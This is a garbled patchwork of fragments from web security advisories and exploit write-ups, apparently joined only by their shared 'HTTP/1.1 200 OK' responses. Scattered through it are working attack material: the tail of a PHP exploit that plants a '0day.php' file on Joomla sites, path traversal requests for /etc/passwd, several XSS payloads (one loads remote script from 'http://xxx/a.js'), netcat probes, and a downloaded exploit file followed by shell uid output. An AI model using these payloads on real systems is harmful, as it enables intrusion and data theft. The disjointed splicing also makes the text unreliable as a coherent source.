200 OK
same behavior would be exhibited by the victim proxy with host names:
// Lets check our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards: 0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close
--B-O-U-N-D-A-R-Y731553141--
reply:
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/
-------
GET /phpmyadmin/setup/index.php HTTP/1.1
Response
--------
HTTP/1.1 200 OK
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') != true)
{ echo "<font color=white>Exploit Failed...</font>"; }
else
echo "<font color=white>Exploit Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
MSG 50 D 555
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it
####^áEu######################ÔùH(############MSNSLP/1.0 200 OK
To: <msnmsgr:bbbbb@hotmail.it>
From: <msnmsgr:aaaa@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 1
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Note also that this packet does not contain any session id.
Response packet:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT
Content-Length: 56
Starting, please wait..."><script>alert(1);</script>
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Connection: close
HEAD /../../var/log/messages HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
only the unfiltered value of the vulnerable parameter. It is possible
to create a URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:
HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500
Date: Thu, 25 Sep 2008 11:35:20 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 36
<html><body>BugSec</body></html><!--=
Content-Length: 0
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain
HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it
--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--
Accept: */*
PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):
HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
src=http://xxx/a.js></script>'>a</a>
</html>
The link includes the cross site scripting injection
and brings the victim to page 2.html. The web server
returns 200 OK. The 2.html source code:
2.HTML
<html>
This is a proof of concept.
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
We have received a lot of questions about the news at http://securityreason.com/news/0/0x1f, and we will show how to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in an .htaccess file. But it is possible to bypass safe_mode or open_basedir via mail.force_extra_parameters. On a lot of servers the mailer is sendmail; it can also be exim etc. But we show how to exploit this for a famous mail server (SENDMAIL).
For example, you can set mail.force_extra_parameters via .htaccess.
cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
#
# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
# => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
#
# 100%[===============================================================================>] 5,421
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
#Response
HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: 300
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"
And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0
Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>
This will result in:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Proxy-Connection: Keep-Alive
When the request is executed, a popup showing the string Pwnd can be seen.
Here is the response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8
You can save it in a text file and use it with netcat
(http://netcat.sourceforge.net/) like:
>nc bld02 80 < db_dump.txt | more
HTTP/1.1 200 OK
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private